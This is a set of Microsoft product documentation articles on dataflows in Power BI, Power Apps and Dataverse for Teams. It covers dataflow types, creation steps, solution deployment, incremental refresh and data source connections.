A dataflow is product-agnostic. It's not a component of Power BI only; you can get
its data in other tools and services.

Dataflows take advantage of Power Query, a powerful, graphical, self-service data


transformation experience.

Dataflows run entirely in the cloud. No additional infrastructure is required.


You have multiple options for starting to work with dataflows, using licenses for
Power Apps, Power BI, and Customer Insights.

Although dataflows are capable of advanced transformations, they're designed for


self-service scenarios and require no IT or developer background.

Use-case scenarios for dataflows


You can use dataflows for many purposes. The following scenarios provide a few
examples of common use cases for dataflows.

Data migration from legacy systems


In this scenario, the decision has been made by an organization to use Power Apps for
the new user interface experience rather than the legacy on-premises system. Power
Apps, Power Automate, and AI Builder all use Dataverse as the primary data storage
system. The current data in the existing on-premises system can be migrated into
Dataverse by using a dataflow, and then these products can use that data.

Using dataflows to build a data warehouse


You can use dataflows as a replacement for other extract, transform, load (ETL) tools to
build a data warehouse. In this scenario, the data engineers of a company decide to use
dataflows to build their star schema–designed data warehouse, including fact and
dimension tables in Data Lake Storage. Then Power BI is used to generate reports and
dashboards by getting data from the dataflows.
Using dataflows to build a dimensional model
You can use dataflows as a replacement for other ETL tools to build a dimensional
model. For example, the data engineers of a company decide to use dataflows to build
the star-schema designed dimensional model, including fact and dimension tables in
Azure Data Lake Storage Gen2. Then Power BI is used to generate reports and
dashboards by getting data from the dataflows.

Centralize data preparation and reuse of datasets across


multiple Power BI solutions
If multiple Power BI solutions are using the same transformed version of a table, the
process to create the table will be repeated multiple times. This increases the load on
the source system, consumes more resources, and creates duplicate data with multiple
points of failure. Instead, a single dataflow can be created to compute the data for all
solutions. Power BI can then reuse the result of the transformation in all solutions. The
dataflow, if used in such a way, can be part of a robust Power BI implementation
architecture that avoids the Power Query code duplicates and reduces the maintenance
costs of the data integration layer.

Next steps
The following articles provide further study materials for dataflows.

Create and use dataflows in Microsoft Power Platform

Creating and using dataflows in Power BI


Understanding the differences between
dataflow types
Article • 08/04/2023

Dataflows are used to extract, transform, and load data to a storage destination where it
can be leveraged for different scenarios. Because not all storage destinations share the
same characteristics, some dataflow features and behaviors differ depending on the
storage destination the dataflow loads data into. Before you create a dataflow, it's
important to understand how the data is going to be used, and choose the storage
destination according to the requirements of your solution.

Selecting a storage destination of a dataflow determines the dataflow's type. A dataflow


that loads data into Dataverse tables is categorized as a standard dataflow. Dataflows
that load data to analytical tables is categorized as an analytical dataflow.

Dataflows created in Power BI are always analytical dataflows. Dataflows created in


Power Apps can either be standard or analytical, depending on your selection when
creating the dataflow.

Standard dataflows
A standard dataflow loads data to Dataverse tables. Standard dataflows can only be
created in Power Apps. One benefit of creating this type of dataflow is that any
application that depends on data in Dataverse can work with the data created by
standard dataflows. Typical applications that leverage Dataverse tables are Power Apps,
Power Automate, AI Builder and Power Virtual Agents.
Standard dataflows versions
We've been working on significant updates to standard dataflows to improve their
performance and reliability. These improvements will eventually be available to all
standard dataflows. But in the interim, we'll differentiate between existing standard
dataflows (version 1) and new standard dataflows (version 2) by adding a version
indicator in Power Apps.
Standard dataflow versions feature comparison
The following table lists the major features differences between standard dataflows V1
and V2, and provides information about each feature's behavior in each version.

Feature Standard V1 Standard V2

Maximum number of 50 Unlimited


dataflows that can be
saved with automatic
schedule per customer
tenant

Maximum number of 500,000 Unbounded. The maximum number of


records ingested per records that can be ingested per query
query/table or table now depends on Dataverse
service protection limits at the time of
ingestion.

Ingestion speed into Baseline performance Improved performance by a few factors.


Dataverse Actual results may vary and depend on
characteristics of the data ingested, and
load on Dataverse service at the time of
ingestion.

Incremental Refresh Not supported Supported


policy

Resiliency When Dataverse service When Dataverse service protection


protection limits are limits are encountered, a record will be
encountered, a record will retried up to 3 times.
be retried up to 3 times.

Power Automate Not supported Supported


integration

Analytical dataflows
An analytical dataflow loads data to storage types optimized for analytics—Azure Data
Lake Storage. Microsoft Power Platform environments and Power BI workspaces provide
customers with a managed analytical storage location that's bundled with those product
licenses. In addition, customers can link their organization’s Azure Data Lake storage
account as a destination for dataflows.

Analytical dataflows are capable additional analytical features. For example, integration
with Power BI’s AI features or use of computed entities which will be discussed later.
You can create analytical dataflows in Power BI. By default, they'll load data to Power BI’s
managed storage. But you can also configure Power BI to store the data in the
organization’s Azure Data Lake Storage.

You can also create analytical dataflows in Power Apps and Dynamics 365 customer
insights portals. When you're creating a dataflow in Power Apps portal, you can choose
between Dataverse managed analytical storage or in your organization’s Azure Data
Lake Storage account.
AI Integration
Sometimes, depending on the requirement, you might need to apply some AI and
machine learning functions on the data through the dataflow. These functionalities are
available in Power BI dataflows and require a Premium workspace.

The following articles discuss how to use AI functions in a dataflow:

Azure Machine Learning integration in Power BI


Cognitive Services in Power BI
Automated Machine Learning in Power BI

Note that the features listed above are Power BI specific and are not available when
creating a dataflow in the Power Apps or Dynamics 365 customer insights portals.

Computed tables
One of the reasons to use a computed table is the ability to process large amounts of
data. The computed table helps in those scenarios. If you have an table in a dataflow,
and another table in the same dataflow uses the first table's output, this action creates a
computed table.

The computed table helps with the performance of the data transformations. Instead of
re-doing the transformations needed in the first table multiple times, the transformation
is done only once in the computed table. Then the result is used multiple times in other
tables.

To learn more about computed tables, go to Creating computed tables in dataflows.

Computed tables are available only in an analytical dataflow.

Standard vs. analytical dataflows


The following table lists some differences between a standard table and an analytical
table.
Operation Standard Analytical

How to create Power Platform dataflows Power BI dataflows


Power Platform dataflows by selecting the
Analytical entities only checkbox when
creating the dataflow

Storage options Dataverse Power BI provided Azure Data Lake storage


for Power BI dataflows, Dataverse provided
Azure Data Lake storage for Power
Platform dataflows, or customer provided
Azure Data Lake storage

Power Query Yes Yes


transformations

AI functions No Yes

Computed table No Yes

Can be used in Yes, through Dataverse Power BI dataflows: Only in Power BI


other applications Power Platform dataflows or Power BI
external dataflows: Yes, through Azure Data
Lake Storage

Mapping to Yes Yes


standard table

Incremental load Default incremental-load Default full-load


Possible to change using the Possible to set up incremental refresh by
Delete rows that no longer setting up the incremental refresh in the
exist in the query output dataflow settings
checkbox at the load settings

Scheduled Refresh Yes Yes, the possibility of notifying the dataflow


owners upon the failure

Scenarios to use each dataflow type


Here are some sample scenarios and best practice recommendations for each type of
dataflow.

Cross-platform usage—standard dataflow


If your plan for building dataflows is to use stored data in multiple platforms (not only
Power BI, but also other Microsoft Power Platform services, Dynamics 365, and so on), a
standard dataflow is a great choice. Standard dataflows store the data in Dataverse,
which you can access through many other platforms and services.

Heavy data transformations on large data tables—


analytical dataflow
Analytical dataflows are an excellent option for processing large amounts of data.
Analytical dataflows also enhance the computing power behind the transformation.
Having the data stored in Azure Data Lake Storage increases the writing speed to a
destination. Compared to Dataverse (which might have many rules to check at the time
of data storage), Azure Data Lake Storage is faster for read/write transactions on a large
amount of data.

AI features—analytical dataflow
If you're planning to use any AI functionality through the data transformation stage,
you'll find it helpful to use an analytical dataflow because you can use all the supported
AI features with this type of dataflow.
Create and use dataflows in Microsoft
Power Platform
Article • 04/06/2023

Using dataflows with Microsoft Power Platform makes data preparation easier, and lets
you reuse your data preparation work in subsequent reports, apps, and models.

In the world of ever-expanding data, data preparation can be difficult and expensive,
consuming as much as 60 to 80 percent of the time and cost for a typical analytics
project. Such projects can require wrangling fragmented and incomplete data, complex
system integration, data with structural inconsistency, and a high skillset barrier.

To make data preparation easier and to help you get more value out of your data, Power
Query and Power Platform dataflows were created.

With dataflows, Microsoft brings the self-service data preparation capabilities of Power
Query into the Power BI and Power Apps online services, and expands existing
capabilities in the following ways:

Self-service data prep for big data with dataflows: Dataflows can be used to
easily ingest, cleanse, transform, integrate, enrich, and schematize data from a
large and ever-growing array of transactional and observational sources,
encompassing all data preparation logic. Previously, extract, transform, load (ETL)
logic could only be included within datasets in Power BI, copied over and over
between datasets, and bound to dataset management settings.

With dataflows, ETL logic is elevated to a first-class artifact within Microsoft Power
Platform services, and includes dedicated authoring and management experiences.
Business analysts, BI professionals, and data scientists can use dataflows to handle
the most complex data preparation challenges and build on each other's work,
thanks to a revolutionary model-driven calculation engine, which takes care of all
the transformation and dependency logic—cutting time, cost, and expertise to a
fraction of what's traditionally been required for those tasks. You can create
dataflows by using the well-known, self-service data preparation experience of
Power Query. Dataflows are created and easily managed in app workspaces or
environments, in Power BI or Power Apps, respectively, enjoying all the capabilities
these services have to offer, such as permission management and scheduled
refreshes.

Load data to Dataverse or Azure Data Lake Storage: Depending on your use case,
you can store data prepared by Power Platform dataflows in the Dataverse or your
organization's Azure Data Lake Storage account:

Dataverse lets you securely store and manage data that's used by business
applications. Data within Dataverse is stored in a set of tables. A table is a set of
rows (formerly referred to as records) and columns (formerly referred to as
fields/attributes). Each column in the table is designed to store a certain type of
data, for example, name, age, salary, and so on. Dataverse includes a base set of
standard tables that cover typical scenarios, but you can also create custom
tables specific to your organization and populate them with data by using
dataflows. App makers can then use Power Apps and Power Automate to build
rich applications that use this data.

Azure Data Lake Storage lets you collaborate with people in your organization
using Power BI, Azure Data, and AI services, or using custom-built Line of
Business Applications that read data from the lake. Dataflows that load data to
an Azure Data Lake Storage account store data in Common Data Model folders.
Common Data Model folders contain schematized data and metadata in a
standardized format, to facilitate data exchange and to enable full
interoperability across services that produce or consume data stored in an
organization’s Azure Data Lake Storage account as the shared storage layer.
Advanced Analytics and AI with Azure: Power Platform dataflows store data in
Dataverse or Azure Data Lake Storage—which means that data ingested through
dataflows is now available to data engineers and data scientists to leverage the full
power of Azure Data Services, such as Azure Machine Learning, Azure Databricks,
and Azure Synapse Analytics for advanced analytics and AI. This enables business
analysts, data engineers, and data scientists to collaborate on the same data within
their organization.

Support for Common Data Model: Common Data Model is a set of a standardized
data schemas and a metadata system to allow consistency of data and its meaning
across applications and business processes. Dataflows support Common Data
Model by offering easy mapping from any data in any shape into the standard
Common Data Model entities, such as Account and Contact. Dataflows also land
the data, both standard and custom entities, in schematized Common Data Model
form. Business analysts can take advantage of the standard schema and its
semantic consistency, or customize their entities based on their unique needs.
Common Data Model continues to evolve as part of the Open Data Initiative .

Dataflow capabilities in Microsoft Power


Platform services
Most dataflow capabilities are available in both Power Apps and Power BI. Dataflows are
available as part of these services' plans. Some dataflow features are either product-
specific or available in different product plans. The following table describes dataflow
features and their availability.

Dataflow capability Power Apps Power BI

Scheduled refresh Up to 48 per day Up to 48


per day

Maximum per entity refresh time Up to 2 hours Up to 2


hours

Dataflow authoring with Power Yes Yes


Query Online

Dataflow management In Power Apps admin portal In Power BI


admin
portal

New connectors Yes Yes


Dataflow capability Power Apps Power BI

Standardized schema / built-in Yes Yes


support for the Common Data
Model

Dataflows Data Connector in Power For dataflows with Azure Data Lake Storage Yes
BI Desktop as the destination

Integration with the organization's Yes Yes


Azure Data Lake Storage

Integration with Dataverse Yes No

Dataflow linked entities For dataflows with Azure Data Lake Storage Yes
as the destination

Computed Entities (in-storage For dataflows with Azure Data Lake Storage Power BI
transformations using M) as the destination Premium
only

Dataflow incremental refresh For dataflows with Azure Data Lake Storage Power BI
as the destination, requires Power Apps Premium
Plan2 only

Running on Power BI Premium No Yes


capacity / parallel execution of
transforms

Known limitations
Copying dataflows as part of a Power Platform environments copy operation is not
supported.

Next steps
More information about dataflows in Power Apps:

Self-service data prep in Power Apps


Creating and using dataflows in Power Apps
Connect Azure Data Lake Storage Gen2 for dataflow storage
Add data to a table in Dataverse by using Power Query
Visit the Power Apps dataflow community and share what you’re doing, ask
questions, or submit new ideas
Visit the Power Apps dataflow community forum and share what you’re doing, ask
questions, or submit new ideas
More information about dataflows in Power BI:

Self-service data prep in Power BI


Create and use dataflows in Power BI
Dataflows whitepaper
Detailed video of a dataflows walkthrough
Visit the Power BI dataflows community and share what you're doing, ask
questions, or submit new ideas

The following articles go into more detail about common usage scenarios for dataflows.

Using incremental refresh with dataflows


Creating computed entities in dataflows
Connect to data sources for dataflows
Link entities between dataflows

For more information about Common Data Model and the Common Data Model folder
standard, read the following articles:

Common Data Model - overview


Common Data Model folders
Common Data Model folder model file definition
Create and use dataflows in Microsoft
Teams (Preview)
Article • 02/17/2023

Microsoft Dataverse for Teams delivers a built-in, low-code data platform for Microsoft
Teams. It provides relational data storage, rich data types, enterprise-grade governance,
and one-click solution deployment. Dataverse for Teams enables everyone to easily
build and deploy apps.

Before today, the way to get data into Dataverse for Teams was by manually adding data
directly into a table. This process can be prone to errors and isn't scalable. But now, with
self-service data prep you can find, clean, shape, and import your data into Dataverse
for Teams.

With your organizational data already sitting in a different location, you can use Power
Query dataflows to directly access your data through the connectors and load the data
into Dataverse for Teams. When you update in your organizational data, you can refresh
your dataflows by just one click and the data in Dataverse for Teams is updated too. You
can also use the Power Query data transformations to easily validate and clean your
data and enforce data quality for your Apps.

Dataflows were introduced to help organizations retrieve data from disparate sources
and prepare it for consumption. You can easily create dataflows using the familiar, self-
service Power Query experience to ingest, transform, integrate, and enrich data. When
creating a dataflow, you'll connect to data, transform the data, and load data into
Dataverse for Teams tables. Once the dataflow is created, it begins the process of
importing data into the Dataverse table. Then you can start building apps to leverage
that data.

Create a dataflow from the dataflows page


In this example, you're going to load data from an Excel file that's located on OneDrive
into Dataverse for Teams.

1. Sign in to Teams web version , and then select the link for Power Apps.

2. Select the Build tab, and then select Dataflows (Preview).


3. To create a new dataflow, select the New button.

4. Select the Excel workbook connector.


5. Enter a URL address in File path or URL, or use the Browse OneDrive button to
navigate through your OneDrive folders. Select the file you want, and then select
the Next button. For more information about using the OneDrive connection or
getting data, see SharePoint and OneDrive for Business files import or Getting data
from other sources.

6. In Navigator, select the tables that are present in your Excel file. If your Excel file
has multiple sheets and tables, select only the tables you're interested in. When
you're done, select Transform data.

7. Clean and transform your data using Power Query. You can use the out-of-the box
transformations to delete missing values, delete unnecessary columns, or to filter
your data. With Power Query, you can apply more than 300 different
transformations on your data. To learn more about Power Query transformations,
see Use Power Query to transform data. After you're finished with preparing your
data, select Next.

8. In Map tables, select Load to new table to create a new table in Dataverse for
Teams. You can also choose to load your data into an existing table. In the Map
tables screen, you can also specify a Unique primary name column and an
Alternate key column (optional). In this example, leave these selections with the
default values. To learn more about mapping your data and the different settings,
see Field mapping considerations for standard dataflows.
9. Select Create to finish your dataflow. Once you’ve created your dataflow, data
begins loading into Dataverse for Teams. This process can take some time and you
can use the management page to check the status. When a dataflow completes a
run, its data is available to use.

Managing your dataflows


You can manage any dataflow you created from the Dataflows (Preview) tab. Here, you
can see the status of all dataflows, when your dataflow was last refreshed, and take
action from the action bar.

In the Last Refresh column, you can see when your data was last refreshed. If your
refresh failed, an error indication appears. If you select the error indication, the details of
the error and recommended steps to address it appear.

In the Status column, you can see the current status of the dataflow. Possible states are:
Refresh in progress: the dataflow is extracting, transforming, and loading your
data from the source to the Dataverse Tables. This process can take several
minutes depending on the complexity of transformations and data source's
performance. We recommend that you check the status of the dataflow frequently.

To navigate to the action bar, select the three dots “…” next to your dataflow.

Here you can:

Edit your dataflow if you want to change your transformation logic or mapping.
Rename your dataflow. At creation, an autogenerated name is assigned.
Refresh your dataflow. When you refresh your dataflows, the data will be updated.
Delete your dataflow.
Show refresh history. This gives you the results from the last refresh.

Select Show refresh history to see information about the last refresh of your dataflow.
When the dataflow refresh is successful, you can see how many rows were added or
updated in Dataverse. When your dataflow refresh wasn't successful, you can investigate
why with the help of the error message.

Dataflows in Teams is a lightweight version


Dataflows in Teams are a lightweight version of dataflows in the maker portal and can
only load data into Dataverse for Teams. Dataflows in Teams are optimized for a one-
time import of data, but you can refresh your data manually through the refresh button
in the dataflow management page. If you want full dataflows functionality, you can
upgrade your environment.

Supported data sources in dataflows in Teams are:


Excel (OneDrive)
Text/CSV (OneDrive)
PDF (OneDrive)
SharePoint Online Folder
SharePoint Online list
XML (OneDrive)
JSON (OneDrive)
OData
Web API

7 Note

Dataflows in Teams don't support on-premises data sources, such as on premises


file locations.

The following table lists the major feature differences between dataflows for Dataverse
in Teams and dataflows for Dataverse.

Dataflow capability Dataverse for Teams Dataverse

Standard dataflows Yes Yes

Analytical dataflows No Yes

Gateway support No Yes

Manual refresh Yes Yes

Scheduled refresh No Yes

Incremental refresh No Yes

Standard tables No Yes

Custom tables Yes Yes

Full PQ functionality Yes Yes

Supported connectors Subset of connectors All connectors

Small data volumes Yes Yes

Larger data volumes No 1 Yes

1
Although there's no limitation on the amount of data you can load into Dataverse for
Teams, for better performance in loading larger amounts of data, we recommend a
Dataverse environment.
Consume data from dataflows
Article • 08/04/2023

The ways you can consume data from Microsoft dataflows depends on several factors,
like storage and type of dataflow. In this article, you learn how to choose the right
dataflow for your needs.

Type of dataflow
There are multiple types of dataflows available for you to create. You can choose
between a Power BI dataflow, standard dataflow, or an analytical dataflow. To learn more
about the differences and how to select the right type based on your needs, go to
Understanding the differences between dataflow types.

Storage type
A dataflow can write to multiple output destination types. In short, you should be using
the Dataflows connector unless your destination is a Dataverse table. Then you use the
Dataverse/CDS connector.

Azure Data Lake Storage


Azure Data Lake storage is available in Power BI dataflows and Power Apps analytical
dataflows. By default you're using a Microsoft Managed Data Lake. However, you can
also connect a self-hosted data lake to the dataflow environment. The following articles
describe how to connect the data lake to your environment:

Connect Data Lake Gen 2 storage to a Power BI Workspace


Connect Data Lake Gen 2 storage to a Power Apps Environment

When you've connected your data lake, you should still use the Dataflows connector. If
this connector doesn't meet your needs, you could consider using the Azure Data Lake
connector instead.

Dataverse
A standard dataflow writes the output data to a Dataverse table. Dataverse lets you
securely store and manage data that's used by business applications. After you load
data in the Dataverse table, you can consume the data using the Dataverse connector.
Dataflows can get data from other dataflows
If you'd like to reuse data created by one dataflow in another dataflow, you can do so by
using the Dataflow connector in the Power Query editor when you create the new
dataflow.

When you get data from the output of another dataflow, a linked table is created.
Linked tables provide a way to make data created in an upstream dataflow available in a
downstream dataflow, without copying the data to the downstream dataflow. Because
linked tables are just pointers to tables created in other dataflows, they're kept up to
date by the refresh logic of the upstream dataflow. If both dataflows reside in the same
workspace or environment, those dataflows are refreshed together, to keep data in both
dataflows always up to date. More information: Link tables between dataflows

Separating data transformation from data


consumption
When you use the output of a dataflow in other dataflows or datasets, you can create an
abstraction between the data transformation layer and the rest of the data model. This
abstraction is important because it creates a multi-role architecture, in which the Power
Query customer can focus on building the data transformations, and data modelers can
focus on data modeling.

Frequently asked questions


My dataflow table doesn't show up in the dataflow connector in Power BI

You're probably using a Dataverse table as the destination for your standard dataflow.
Use the Dataverse/CDS connector instead or consider switching to an analytical
dataflow.
There's a difference in the data when I remove duplicates in dataflows—how can I
resolve this?

There could be a difference in data between design-time and refresh-time. We don't


guarantee which instance is being kept during refresh time. For information that will
help you avoid inconsistencies in your data, go to Working with duplicate values.

Next Steps
The following articles provide more details about related articles.

Creating and using dataflows in Power BI


Connect to data created by Power BI dataflows in Power BI Desktop (Beta)
Create and use dataflows in Power Platform
Working with duplicate values in dataflows
Overview of solution-aware dataflows
Article • 03/14/2023

When you include your dataflows in a solution, their definitions become portable,
making it easier to move them from one environment to another, saving time required
to author the dataflow.

A typical use case is for an independent software vendor (ISV) to develop a solution
containing a dataflow, that extracts and transforms data from a data source to Dataverse
tables, in a sandbox environment. The ISV would then move that dataflow and
destination tables to a test environment to test with their test data source to validate
that the solution works well and is ready for production. After testing completes, the ISV
would provide the dataflow and tables to clients who will import them into their
production environment to operate on client’s data. This process is much easier when
you add both the dataflows and tables they load data to into solutions, and then move
the solutions and their contents between environments.

Dataflows added to a solution are known as solution-aware dataflows. You can add
multiple dataflows to a single solution.

7 Note

Only dataflows created in Power Platform environments can be solution-


aware.
The data loaded by dataflows to their destination isn't portable as part of
solutions, only the dataflow definitions are. To recreate the data after a
dataflow was deployed as part of a solution, you need to refresh the dataflow.

Add an existing dataflow to a solution


Follow these steps to add a dataflow to a solution.

Prerequisites
You need to have created a solution before you can add a dataflow to it. More
information: Create solutions
You need to be the owner of at least one dataflow in the environment. More
information: Create dataflows
Add the dataflow
1. Sign in to Power Apps .

2. Select Solutions from the navigation bar.

3. Select the solution you'll add your dataflow to, and from the context menu select
Edit.

4. Select Add Exiting > Automation > Dataflow.

5. Optional: If your dataflow loads data into a custom Dataverse table, add the
custom table to the solution as well.

In this example, the dataflow you added to the solution loads data into a custom
table called Full Order Details, which you want to also include in the solution with
the dataflow.

Once both the dataflow and table it loads data to are added to the solution, it has
the two artifacts added to the solution. In this case, the artifacts are
cr0c8_FullOrderDetails and Import Sales Data.

To save your work, be sure to publish all customizations. Now, the solution is ready
for you to export from the source environment and import to the destination
environment.

Exporting and importing solutions containing


dataflows
Exporting and importing solutions containing dataflows is identical to doing the same
operations for other artifacts. For the most up-to-date instructions, go to the
documentation on exporting and importing solutions.

Updating a dataflow's connections after


solution import
For security reasons, credentials of connections used by dataflows aren't persisted by
solutions. Once a dataflow is deployed as part of a solution, you'll need to edit its
connections before it can be scheduled to run.

1. On the left navigation pane, select the down arrow next to Dataverse and select
Dataflows. Identify the dataflow that was imported, and select Edit from the
context menu.

2. In the Dataflow list, locate and double-click the dataflow that was added as part of
the solution you’ve imported.

3. You'll be asked to enter credentials required for the dataflow.

Once the credentials for the connection have been updated, all queries that use
that connection automatically load.

4. If your dataflow loads data in Dataverse tables, select Next to review the mapping
configuration.

5. The mapping configuration is also saved as part of the solution. Since you also
added the destination table to the solutions, there's no need to recreate the table
in this environment and you can publish the dataflow.

That's it. Your dataflow now refreshes and loads data to the destination table.

Known limitations
Dataflows can't be created from within solutions. To add a dataflow to a solution,
follow the steps outlined in this article.
Dataflows can't be edited directly from within solutions. Instead, the dataflow must
be edited in the dataflows experience.
Dataflows can't use connection references for any connector.
Environment variables can't be used by dataflows.
Dataflows don't support adding required components, such as custom tables they
load data to. Instead, the custom table should be manually added to the solution.
Dataflows can't be deployed by application users (service principals).
Incremental refresh configuration isnt supported when deploying solutions. After
deployment of the dataflow via solution, the incremental refresh configuration
should be reapplied.
Linked tables to other dataflows aren't supported when deploying solutions. After
deployment of the dataflow via solution, please edit the dataflow and edit the
connection to the linked dataflow.
Using incremental refresh with
dataflows
Article • 08/04/2023

With dataflows, you can bring large amounts of data into Power BI or your
organization's provided storage. In some cases, however, it's not practical to update a
full copy of source data in each refresh. A good alternative is incremental refresh, which
provides the following benefits for dataflows:

Refresh occurs faster: Only data that's changed needs to be refreshed. For
example, refresh only the last five days of a 10-year dataflow.
Refresh is more reliable: For example, it's not necessary to maintain long-running
connections to volatile source systems.
Resource consumption is reduced: Less data to refresh reduces overall
consumption of memory and other resources.

Incremental refresh is available in dataflows created in Power BI and dataflows created in


Power Apps. This article shows screens from Power BI, but these instructions apply to
dataflows created in Power BI or in Power Apps.

7 Note

When the schema for a table in an analytical dataflow changes, a full refresh takes
place to ensure that all the resulting data matches the new schema. As a result, any
data stored incrementally is refreshed and in some cases, if the source system
doesn't retain historic data, is lost.
Using incremental refresh in dataflows created in Power BI requires that the dataflow
reside in a workspace in Premium capacity. Incremental refresh in Power Apps requires
Power Apps per-app or per-user plans, and is only available for dataflows with Azure
Data Lake Storage as the destination.

In either Power BI or Power Apps, using incremental refresh requires that source data
ingested into the dataflow have a DateTime field on which incremental refresh can filter.

Configuring incremental refresh for dataflows


A dataflow can contain many tables. Incremental refresh is set up at the table level,
allowing one dataflow to hold both fully refreshed tables and incrementally refreshed
tables.

To set up an incremental-refreshed table, start by configuring your table as you would


any other table.
After the dataflow is created and saved, select Incremental refresh in the table view,
as shown in the following image.

When you select the icon, the Incremental refresh settings window appears. Turn on
incremental refresh.
The following list explains the settings in the Incremental refresh settings window.

Incremental refresh on/off toggle: Turns the incremental refresh policy on or off
for the table.

Filter field drop-down: Selects the query field on which the table should be filtered
for increments. This field only contains DateTime fields. You can't use incremental
refresh if your table doesn't contain a DateTime field.

Store/refresh rows from the past: The example in the previous image illustrates
these next few settings.

In this example, we define a refresh policy to store five years of data in total and
incrementally refresh 10 days of data. Assuming that the table is refreshed daily,
the following actions are carried out for each refresh operation:

Add a new day of data.


Refresh 10 days, up to the current date.

Remove calendar years that are older than five years before the current date.
For example, if the current date is January 1, 2019, the year 2013 is removed.

The first dataflow refresh might take a while to import all five years, but
subsequent refreshes are likely to be completed much more quickly.

Detect data changes: An incremental refresh of 10 days is much more efficient


than a full refresh of five years, but you might be able to do even better. When you
select the Detect data changes check box, you can select a date/time column to
identify and refresh only the days where the data has changed. This assumes such
a column exists in the source system, which is typically for auditing purposes. The
maximum value of this column is evaluated for each of the periods in the
incremental range. If that data hasn't changed since the last refresh, there's no
need to refresh the period. In the example, this might further reduce the days
incrementally refreshed from 10 to perhaps 2.

 Tip

The current design requires that the column used to detect data changes be
persisted and cached into memory. You might want to consider one of the
following techniques to reduce cardinality and memory consumption:
Persist only the maximum value of this column at time of refresh, perhaps
by using a Power Query function.
Reduce the precision to a level that's acceptable given your refresh-
frequency requirements.

Only refresh complete periods: Imagine that your refresh is scheduled to run at
4:00 AM every day. If data appears in the source system during those first four
hours of that day, you might not want to account for it. Some business metrics,
such as barrels per day in the oil and gas industry, aren't practical or sensible to
account for based on partial days.

Another example where only refreshing complete periods is appropriate is


refreshing data from a financial system. Imagine a financial system where data for
the previous month is approved on the 12th calendar day of the month. You can
set the incremental range to one month and schedule the refresh to run on the
12th day of the month. With this option selected, the system will refresh January
data (the most recent complete monthly period) on February 12.
7 Note

Dataflow incremental refresh determines dates according to the following logic: if a


refresh is scheduled, incremental refresh for dataflows uses the time zone defined
in the refresh policy. If no schedule for refreshing exists, incremental refresh uses
the time from the computer running the refresh.

After incremental refresh is configured, the dataflow automatically alters your query to
include filtering by date. If the dataflow was created in Power BI, you can also edit the
automatically generated query by using the advanced editor in Power Query to fine-
tune or customize your refresh. Read more about incremental refresh and how it works
in the following sections.

Incremental refresh and linked tables vs.


computed tables
For linked tables, incremental refresh updates the source table. Because linked tables are
simply a pointer to the original table, incremental refresh has no impact on the linked
table. When the source table is refreshed according to its defined refresh policy, any
linked table should assume the data in the source is refreshed.

Computed tables are based on queries running over a data store, which can be another
dataflow. As such, computed tables behave the same way as linked tables.

Because computed tables and linked tables behave similarly, the requirements and
configuration steps are the same for both. One difference is that for computed tables, in
certain configurations, incremental refresh can't run in an optimized fashion because of
the way partitions are built.

Changing between incremental and full refresh


Dataflows support changing the refresh policy between incremental and full refresh.
When a change occurs in either direction (full to incremental or incremental to full), the
change affects the dataflow after the next refresh.

When moving a dataflow from full refresh to incremental, the new refresh logic updates
the dataflow by adhering to the refresh window and increment as defined in the
incremental refresh settings.
When moving a dataflow from incremental to full refresh, all data accumulated in the
incremental refresh is overwritten by the policy defined in the full refresh. You must
approve this action.

Time zone support in incremental refresh


Dataflow incremental refresh is dependent on the time at which it's run. The filtering of
the query is dependent on the day on which it's run.

To accommodate those dependencies and to ensure data consistency, incremental


refresh for dataflows implements the following heuristic for refresh now scenarios:

In the case where a scheduled refresh is defined in the system, incremental refresh
uses the time-zone settings from the scheduled refresh section. This ensures that
whatever time zone the person refreshing the dataflow is in, it will always be
consistent with the system's definition.

If no scheduled refresh is defined, dataflows use the time zone from the computer
of the user who's performing the refresh.

Incremental refresh can also be invoked by using APIs. In this case, the API call can hold
a time-zone setting that's used in the refresh. Using APIs can be helpful for testing and
validation purposes.

Incremental refresh implementation details


Dataflows use partitioning for incremental refresh. Incremental refresh in dataflows
keeps the minimum number of partitions to meet refresh policy requirements. Old
partitions that go out of range are dropped, which maintains a rolling window. Partitions
are opportunistically merged, reducing the total number of partitions required. This
improves compression and, in some cases, can improve query performance.

The examples in this section share the following refresh policy:

Store rows in the last 1 Quarter


Refresh rows in the last 10 Days
Detect data changes = False
Only refresh complete days = True

Merge partitions
In this example, day partitions are automatically merged to the month level after they
go outside the incremental range. Partitions in the incremental range need to be
maintained at daily granularity to allow only those days to be refreshed. The refresh
operation with Run Date 12/11/2016 merges the days in November, because they fall
outside the incremental range.

Drop old partitions


Old partitions that fall outside the total range are removed. The refresh operation with
Run Date 1/2/2017 drops the partition for Q3 of 2016 because it falls outside the total
range.

Recovery from prolonged failure


This example simulates how the system recovers gracefully from prolonged failure. Let's
say refresh doesn't run successfully because data source credentials expired, and the
issue takes 13 days to resolve. The incremental range is only 10 days.
The next successful refresh operation, with Run Date 1/15/2017, needs to backfill the
missing 13 days and refresh them. It also needs to refresh the previous nine days
because they weren't refreshed on the normal schedule. In other words, the incremental
range is increased from 10 to 22 days.

The next refresh operation, with Run Date 1/16/2017, takes the opportunity to merge
the days in December and the months in Q4 of 2016.

Dataflow incremental refresh and datasets


Dataflow incremental refresh and dataset incremental refresh are designed to work in
tandem. It's acceptable and supported to have an incrementally refreshing table in a
dataflow, fully loaded into a dataset, or a fully loaded table in a dataflow incrementally
loaded to a dataset.

Both approaches work according to your specified definitions in the refresh settings.
More information: Incremental refresh in Power BI Premium

See also
This article described incremental refresh for dataflows. Here are some more articles that
might be useful:

Self-service data prep in Power BI


Creating computed tables in dataflows
Connect to data sources for dataflows
Link tables between dataflows
Create and use dataflows in Power BI
Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


Connect to data sources for dataflows
Article • 02/17/2023

With Microsoft Power BI and Power Platform dataflows, you can connect to many
different data sources to create new dataflows, or add new entities to an existing
dataflow.

This article describes how to create dataflows by using these data sources. For an
overview of how to create and use dataflows, go to Creating a dataflow for Power BI
service and Create and use dataflows in Power Apps.

Create a dataflow from a data source


To create a dataflow from a data source, you'll first have to connect to your data.

Power BI service

To connect to data in Power BI:

1. Open a workspace.
2. Select New.
3. Select Dataflow from the drop-down menu.
4. Under Define new tables, select Add new tables.

Data sources for dataflows


Once you've created the dataflow from the dataflow authoring tool, you'll be presented
with the Choose data source dialog box.
Data sources for dataflows are organized into the following categories, which appear as
tabs in the Choose data source dialog box:

All categories
File
Database
Power Platform
Azure
Online Services
Other

For a list of all of the supported data sources in Power Query, go to Connectors in Power
Query.

